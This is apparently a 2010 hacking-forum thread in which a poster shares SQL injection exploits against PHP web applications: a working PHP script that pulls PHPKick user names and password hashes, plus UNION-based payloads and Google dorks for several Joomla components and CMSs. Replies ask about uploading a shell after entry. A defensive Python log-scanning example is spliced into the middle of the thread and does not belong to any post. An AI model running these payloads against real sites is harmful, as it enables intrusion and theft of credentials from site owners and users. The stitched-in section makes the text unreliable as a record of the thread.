:: vBspiders Professional Network ::


Master vbspiders 08-09-2010 10:03 PM

PHPKick v0.8 statistics.php SQL Injection Exploit
 
PHP Code:

# Exploit Title: PHPKick v0.8 statistics.php SQL Injection
# Date: August 8th, 2010
# Time: 03:45am ;(
# Author: garwga
# Version: 0.8
# Google dork : "© 2004 PHPKick.de Version 0.8"
# Category:  webapps/0day
# Code: see below
  
<?php
    
echo"\n\n";
    echo
"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
    echo
"|                                                                            |\n";
    echo
"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";
    echo
"|                                                                            |\n";
    echo
"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";
    echo
"|                                                                            |\n";
  
    echo
"|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo
"|      (magic_quotes, register_globals).This exploit is only for educational |\n";
    echo
"|      use, use it on your own risk! Exploiting scripts without permission of|\n";
    echo
"|      the owner of the webspace is illegal!                                 |\n";
    echo
"|      I'm not responsible for any resulting damage                          |\n";
    echo
"|                                                                            |\n";
    echo
"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";
    echo
"|                                                                            |\n";
    echo
"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";
    echo
"|============================================================================|\n\n\n";
  
  
if(
$_SERVER['argv'][1] && $_SERVER['argv'][2]){
    
$host=$_SERVER['argv'][1];
    
$path=$_SERVER['argv'][2];
    
$spos=strpos($host,"http://");
    if(!
is_int($spos)&&($spos==0)){
       
$host="http://$host";
      }
    if(!
$host=="http://localhost"){
       
$spos=strpos($host,"http://www.");
       if (!
is_int($spos)&&($spos==0)){
          
$host="http://www.$host";
          }
      }
    
$exploit="statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f";
    echo
"exploiting...\n";
    
$source=file_get_contents($host.$path.$exploit);
    
$username=GetBetween($source," :<br>",":");
    echo 
"username: $username\n";
    
$hash=GetBetween($source,"<br>$username:","</td>");
    echo
"hash: $hash\n";
    }
else{
    echo
"\n\n";
    echo
"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
    echo
"|                                                                            |\n";
    echo
"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";
    echo
"|                                                                            |\n";
    echo
"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";
    echo
"|                                                                            |\n";
  
    echo
"|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo
"|      (magic_quotes, register_globals).This exploit is only for educational |\n";
    echo
"|      use, use it on your own risk! Exploiting scripts without permission of|\n";
    echo
"|      the owner of the webspace is illegal!                                 |\n";
    echo
"|      I'm not responsible for any resulting damage                          |\n";
    echo
"|                                                                            |\n";
    echo
"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";
    echo
"|                                                                            |\n";
    echo
"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";
    echo
"|============================================================================|\n";
}
// Return the text found between $start and $end in $content, or '' if $start is absent.
function GetBetween($content,$start,$end){
    $r=explode($start,$content);
    if (isset($r[1])){
        $r=explode($end,$r[1]);
        return $r[0];
    }
    return '';
}

?>

Master vbspiders 08-09-2010 10:05 PM

Tycoon CMS Record Script SQL Injection Vulnerability
 
PHP Code:

Tycoon(CMS) Record Script Sql vulnerability
 
-------------------------------------------------------------------------------
                        0xPrivate 0xSecurity 0xTeam
                             A Place Of 0days
------------------------------------------------------------------------------
 
^Exploit Title  : Tycoon(CMS) Record Script Sql vulnerability
^Date       : 7/8/2010
^Vendor Site    : http://www.tycoon.co.kr
^MOD Version    : 1.0.9
^Author     : Silic0n (science_media017[At]yahoo.com)
^category:  : webapps/0day
^Dork       : inurl:index.php?mode=game_player
 
------------------------------------------------------------------------------
Special Thanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o ,
 Dark , XG3N , Belma(sweety), messsy , Thor ,abronsius ,Nova ,
 ConsoleFx , Exi , Beenu , R4cal , jaya ,entr0py,[]0iZy5 & All my friends .
 
My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) , www.root-market.com ,www.Darkode.com ,r00tDefaced.com
 
----------------------------------->Exploit<----------------------------------
 
0x1: Goto http://{localhost}/record/index.php?mode=game_player&type=0&year=2010&game_id=-14 UNion Select 1,2,@@version
 
Version : (4.0.22-log)
 
------------------------------------------------------------------------------ 


Master vbspiders 08-09-2010 10:07 PM

Joomla Component com_neorecruit 1.4 SQL Injection Vulnerability
 
PHP Code:

-----------------------------------------------------------------------
 Joomla Component com_neorecruit 1.4 (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : August, 07-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : NeoRecruit
Version     : 1.4 Lower versions may also be affected
Vendor      : http://www.neojoomla.com/
Price       : 54,90 €
Google Dork : inurl:com_neorecruit
----------------------------------------------------------------
 
Xploit:
~~~~~~~
 
-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users--
 
Poc:
~~~~~~~
 
http://127.0.0.1/[path]/index.php?option=com_neorecruit&task=offer_view&id=[SQLi]
 
----------------------------------------------------------------
 
WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com
 
---------------------------[EOF]-------------------------------- 


KALASH3R 08-10-2010 03:39 PM

Thank you for your effort.

God bless you.

Master vbspiders 08-11-2010 01:32 AM

KALASH3R
I don't want off-topic replies.
Regards

PrInCe Of PeRsIa 08-11-2010 01:57 AM

thanxxx so much mohammad
keep ur job like this

Master vbspiders 08-27-2010 02:32 PM

Prometeo v1.0.65 SQL Injection Vulnerability
 
PHP Code:

=================================
Prometeo (vers. 1.0.65)  -SQLi Vulnerability-
=================================

- Vulnerability ID: LD3
- Product: Prometeo
- Vendor: Prometeo (http://www.infomedia2000.it/prometeo/)
- Vulnerability Type: SQL Injection
- Status: Unfixed
- Risk level: High
- Credit: Network Security (http://www.netw0rksecurity.net/)

- Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. An attacker can use browser to exploit this vulnerability.

- Google Dork: inurl:categoria.php?IDcomune
 
-Example:
http://server/categoria.php?ID=132%20and%201=2%20union%20select%201,concat(nome,0x3a,password),3,4,5,6,7,8,9,10,null,12,13,14,15,16,17%20from%20users--
 
# Netw0rkSecurity.net [2010-08-26]                 



Master vbspiders 08-27-2010 02:35 PM

Joomla Component (com_remository) SQL Injection Vulnerability
 
PHP Code:

############################## ALGERIAN HAX0RZ #############################..
# Exploit Title: [title]
# Date: 24/08/2010
# Author: TopSat13
# Software Link: http://remository.com/downloads/
# Version: 1
# Tested on: [win sp3 os]
# CVE : [if exists]
####
#              oooo[ Software Information ]oooo
# Author: TopSat13
#
# Email: TopSat13@live.fr
#
# Vendor : http://remository.com/
#
# title : Joomla Component (com_remository) SQL Injection Vulnerability
#
# Dork :"inurl:index.php?option=com_remository"
#
####           oooo[ vuln & exploit & Demo ]oooo
#
# vuln: site.com/index.php?option=com_remository&Itemid=[sql]
# or
# vuln: site.com/index.php?option=c&Itemid=183&func=selectcat&cat=[sql]
#
# exploit:
#
# 0nligne demo :
http://www.site.com/portail/index.php?option=com_remository&Itemid=183&func=selectcat&cat=3'
#
#
####          oooo[ Greeeeeeeeeeeeeeeeeeetz ]oooo
#
# to : ALLAH , All my friends , all Muslim hackerz
#
############################## ALGERIAN H4X0RZ ################################..


Master vbspiders 08-27-2010 02:37 PM

Joomla Component (com_zoomportfolio) SQL Injection Vulnerability
 
PHP Code:

---------------------------------------------------------------------------------
Joomla Component Zoom Portfolio (id) Remote Sql Injection
---------------------------------------------------------------------------------
 
Author          : Chip D3 Bi0s
Group           : LatinHackTeam
Email/msn       : chipdebios@gmail.com
Date            : 23 August 2010
Critical Lvl    : Moderate
Impact          : Exposure of sensitive information
Where           : From Remote
---------------------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application     : Zoom Portfolio --Joomla Portfolio Component
version         : 1.5
Price           : $20.00
Developer       : EGBZOOM
License         : GPLv2 or later           type  : Commercial
Date Added      : 21 August 2010
Download        : http://www.egbzoom.com/joomla-portfolio-component.html
 
Description     :
 
Zoom Portfolio enables you to display your portfolio in a "directory listing-like
presentation" with minimum effort. The Component has features like add category,
add images, settings, add portfolio. Zoom Portfolio includes automatic thumbnail creation,
captioning, searching and more. It also includes the ability to modify and delete any
of your existing pages.
The Zoom Portfolio is an amazing example of what can be done online with your online
presence. It is directed at artists of all walks of life, it is very easy to install
and customize, and it is just simply stunning.
 
-------------------------
 
How to exploit
 
http://127.0.0.1/path/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=[sql]
 
-------------------------
 
+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++ 


Master vbspiders 08-27-2010 02:39 PM

LINK CMS SQL Injection Vulnerability
 
PHP Code:

# Exploit Title: LINK CMS.SQL Injection Vulnerability
# Date: 2010-08-23
# Author: hacker@sr.gov.yu
# Software Link: http://www.link-softsolutions.com/SoftLink-Content-Management-System---CMS_20_1
# Version: n/a
 
 
####################################################################
.:. Author : hacker@sr.gov.yu
.:. Contact : hacker@evilzone.org, hacker@sr.gov.yu(MSN)
.:. Home : www.evilzone.org, www.pentesting-rs.org
.:. Script : LINK CMS
.:. Bug Type : Sql Injection
.:. Risk : High
.:. Tested on : Windows & Linux
 
####################################################################
 
===[ Exploit ]===
 
.:. It was found that LINK CMS does not validate properly the "IDStranicaPodaci"
parameter value.
 
http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]
 
===[ Example ]===
 
http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63
UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
 
 
===[ Solution ]===
 
.:. Input validation of "IDStranicaPodaci" parameter should be corrected.
 
 
Greetz to ALL EVILZONE.org && pentesting-rs.org members!!!
Greetings to everyone from Serbia!!! :-)))
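
Every advisory posted in this thread puts SQL into a request parameter that the application treats as an integer row id (gameday, game_id, id, cat, Itemid, IDStranicaPodaci). The following is an added example, not part of any post in the thread: a log check that flags requests where one of those parameters carries anything other than digits. The parameter list, the "combined" log format and the sample lines are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters the advisories in this thread show being used as integer row ids.
INT_PARAMS = {"gameday", "game_id", "id", "cat", "itemid", "idstranicapodaci"}
# Tokens that appear in the thread's request shapes; a tripwire, not a SQL parser.
SQL_HINT = re.compile(r"\b(union|select|concat|from)\b|--|@@", re.I)
# Apache/nginx "combined" format: capture the client address and request target.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

def check_request(target):
    """Return [(param, kind)] for integer parameters that carry anything else."""
    findings = []
    try:
        query = urlsplit(target).query
    except ValueError:          # malformed target: nothing to parse
        return findings
    # parse_qsl percent-decodes and maps '+' to a space, so encoded payloads
    # are inspected in the form the application receives them.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() not in INT_PARAMS or re.fullmatch(r"\d+", value):
            continue            # not a watched parameter, or a plain row id
        kind = "sql-keywords" if SQL_HINT.search(value) else "not-a-row-id"
        findings.append((name, kind))
    return findings

def scan(lines):
    """Return [(client, param, kind)] for every suspicious logged request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            client, target = m.groups()
            hits += [(client, n, k) for n, k in check_request(target)]
    return hits

# Constructed sample log lines (documentation addresses; request shapes from the posts above).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Aug/2010:14:39:01 +0000] "GET /navigacija.php?jezik=lat&IDStranicaPodaci=63 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [27/Aug/2010:14:39:07 +0000] "GET /navigacija.php?jezik=lat&IDStranicaPodaci=-63%20UNION%20SELECT%201,2,3,4--%20 HTTP/1.1" 200 5300',
    '192.0.2.44 - - [27/Aug/2010:14:39:09 +0000] "GET /index.php?option=com_remository&Itemid=183&func=selectcat&cat=3%27 HTTP/1.1" 500 312',
    '192.0.2.10 - - [27/Aug/2010:14:40:12 +0000] "GET /index.php?option=com_neorecruit&task=offer_view&id=12 HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same digits-only test, applied inside the application before the value reaches the query, is the input validation the LINK CMS advisory asks for. Sites that legitimately pass non-numeric values in these parameters need the list adjusted.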


MadaRaXP 08-28-2010 06:04 AM

perl language ?
it needs Some Application To Run

winfil 12-01-2010 03:19 AM

thank you so much homie, at last i found something more stable. i want to ask you if i can upload my shell when i enter the db & other question can i use "havij" with those exploits

